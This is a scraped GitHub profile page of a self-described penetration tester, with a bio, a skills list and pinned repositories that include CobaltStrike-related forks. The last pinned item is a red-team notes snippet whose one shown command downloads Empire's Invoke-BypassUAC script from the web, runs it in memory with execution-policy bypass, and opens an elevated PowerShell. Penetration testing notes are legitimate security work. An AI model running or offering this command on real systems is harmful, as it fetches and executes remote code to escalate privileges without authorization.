Skip to content
View moscowchill's full-sized avatar

Block or report moscowchill

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
moscowchill/README.md

I'm moscowchill, a hacker (OSCP certified since 2019), security engineer and founder of DigitalGaurds.

More about me
  • Name: moscowchill
  • From: The Netherlands
  • Security Researcher | Penetration Tester | Security Engineer
  • I have years of experience in pentesting,bug Hunting,forensics & social engineering.
  • Reach me at [email protected]


Present Status

πŸ‘‰ Pentesting/tooling & Bug hunting.

πŸ‘‰ Writing Some Useful Tools For Myself & Communities

πŸ‘‰ Building & Contributing To Open Source Projects

πŸ‘‰ Currently Learning post quantum security and web3


Knowledge & Skills


Burp Suite Metasploit Wireshark Bash Python Linux Go Git Debian Docker Flutter C C++ Java HTML5 CSS3 JavaScript BlackArch MongoDB ExpressJS React Parrot OS NodeJS Ubuntu Kali Linux VS Code

GitHub Stats πŸ‘¨β€πŸ’»

Verse's GitHub stats GitHub Streak

Pinned Loading

  1. LSTAR-EN LSTAR-EN Public

    Forked from lintstar/LSTAR

    LSTAR - CobaltStrike Translated to EN

    PowerShell 9 2

  2. geacon_plus-en geacon_plus-en Public

    Forked from Z3ratu1/geacon_plus

    CobaltStrike beacon written in golang

    Go 3

  3. DigitalGuards/DGmailer DigitalGuards/DGmailer Public

    Email marketing tool built with Python and PyQt5 with support for multiple SMTP servers, optional proxy support, and advanced delivery controls.

    Python 1

  4. NK-Fuzzer NK-Fuzzer Public

    Forked from 0xKayala/NucleiFuzzer

    NucleiFuzzer is a Powerful Automation tool for detecting XSS, SQLi, SSRF, Open-Redirect, etc.. Vulnerabilities in Web Applications

    Shell 1

  5. Intern Pentesting notes Intern Pentesting notes
    1
    [+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
    2
    
                  
    3
    #Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    4
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
    5